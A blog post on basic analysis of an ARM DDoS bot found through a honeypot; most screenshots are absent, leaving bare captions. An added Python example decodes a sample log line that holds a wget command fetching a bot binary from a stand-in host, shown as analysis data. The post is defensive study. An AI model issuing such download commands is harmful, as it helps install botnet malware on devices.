Saturday, 26 November 2016

Basics of ARM/MIPS malware analysis

On one of my honeypots I found an interesting log line containing some URL-encoded content. I wondered what I would find if I managed to decode that GET request...

The line I'm talking about:

Visiting this URL will show me the page:

...but we will get back to it later. After decoding the string I found another GET request, this time for an ARM binary.

Quick download and open:

I was looking for some functions:

Reading the "code-flow" starting from the Main() function:

I started to understand what the binary does:

...and more:

And that's how I found this function:

Next I tried here:

...and here:

Yep, some pseudo-C code ;) Next:


Next function was getlocalip():

At this stage, I wondered whether there were other interesting function names:

Now I could read the other function names as well:

Connect(). The next one reads remote input (which gives the bot's operator some RCE capability):

...and we'll land here:

Reading (and 'decoding') the string, it looks like it will take us here:

So... after converting the hex to a string, it looks like the C&C server is located here (please correct me if I'm wrong):
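The two decoding steps used above, unwrapping the URL-encoded GET from the honeypot log to find the download URL and turning the hex string back into text to recover the C&C address, as an added example that is not part of the original post. The log line, the hostname and the hex blob are constructed; the decoded address is from a documentation IP range.

```python
import re
from urllib.parse import unquote

# Constructed sample honeypot log line (not from the original post): a GET whose
# query string carries a URL-encoded download command. The host is a reserved
# example name, so nothing here points at a real server.
SAMPLE_LOG = (
    '198.51.100.7 - - [26/Nov/2016:10:14:02 +0100] "GET /cgi-bin/index.cgi?'
    'cmd=cd%20%2Ftmp%3Bwget%20http%3A%2F%2Fexample.invalid%2Fbins%2Fbot.arm%3B'
    ' HTTP/1.1" 200 -'
)

# Constructed hex string of the kind pulled from the binary's data section;
# it decodes to a documentation-range IP:port, not a real C&C.
SAMPLE_HEX = "31 39 38 2e 35 31 2e 31 30 30 2e 32 33 3a 32 33"

URL_RE = re.compile(r'https?://[^\s;"\'<>]+')
HEX_RE = re.compile(r'(?:\\x|0x)?([0-9a-fA-F]{2})')


def fully_unquote(text: str, max_rounds: int = 5) -> str:
    """Percent-decode until the result stops changing, so double-encoded
    payloads (%2520 -> %20 -> space) are unwrapped completely."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def extract_urls(log_line: str) -> list:
    """Decode a request line and return every URL embedded in it, in order and
    without duplicates. These are the next artefacts to fetch for analysis."""
    decoded = fully_unquote(log_line)
    seen, urls = set(), []
    for url in URL_RE.findall(decoded):
        if url not in seen:
            seen.add(url)
            urls.append(url)
    return urls


def hex2string(blob: str) -> str:
    """Turn a hex dump ('31 39 ...', '\\x31\\x39...' or '0x31,0x39,...') into
    text, which is how the C&C address was recovered from the binary."""
    raw = bytes(int(pair, 16) for pair in HEX_RE.findall(blob))
    return raw.decode("ascii", errors="replace")


if __name__ == "__main__":
    print(extract_urls(SAMPLE_LOG))   # ['http://example.invalid/bins/bot.arm']
    print(hex2string(SAMPLE_HEX))     # 198.51.100.23:23
```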

So, here:

... and it will take us here:

So... nice DDoS bot.

...but it is already known and has been analysed here. Big thanks for the SANS paper; it helped me a lot with this case. :)
